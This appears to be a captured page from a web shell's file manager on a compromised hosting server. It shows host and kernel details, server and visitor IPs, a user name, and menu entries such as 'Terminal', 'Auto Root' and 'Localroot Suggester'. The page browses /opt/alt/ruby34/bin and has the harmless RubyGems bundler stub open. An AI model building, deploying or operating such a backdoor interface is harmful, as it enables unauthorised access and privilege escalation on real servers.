Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.64
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
bundle
571
B
-rwxr-xr-x
2025-03-20 14:09
bundler
573
B
-rwxr-xr-x
2025-03-20 14:09
erb
532
B
-rwxr-xr-x
2025-03-20 14:09
gem
260
B
-rwxr-xr-x
2025-03-20 14:09
rackup
550
B
-rwxr-xr-x
2025-02-03 16:20
rake
538
B
-rwxr-xr-x
2025-03-20 14:09
rdoc
538
B
-rwxr-xr-x
2025-03-20 14:09
ri
534
B
-rwxr-xr-x
2025-03-20 14:09
ruby
15.27
KB
-rwxr-xr-x
2025-03-20 14:09
syntax_suggest
598
B
-rwxr-xr-x
2025-03-20 14:09
Save
Rename
#!/opt/alt/ruby34/bin/ruby # # This file was generated by RubyGems. # # The application 'bundler' is installed as part of a gem, and # this file is here to facilitate running it. # require 'rubygems' version = ">= 0.a" str = ARGV.first if str str = str.b[/\A_(.*)_\z/, 1] if str and Gem::Version.correct?(str) version = str ENV['BUNDLER_VERSION'] = str ARGV.shift end end if Gem.respond_to?(:activate_bin_path) load Gem.activate_bin_path('bundler', 'bundle', version) else gem "bundler", version load Gem.bin_path("bundler", "bundle", version) end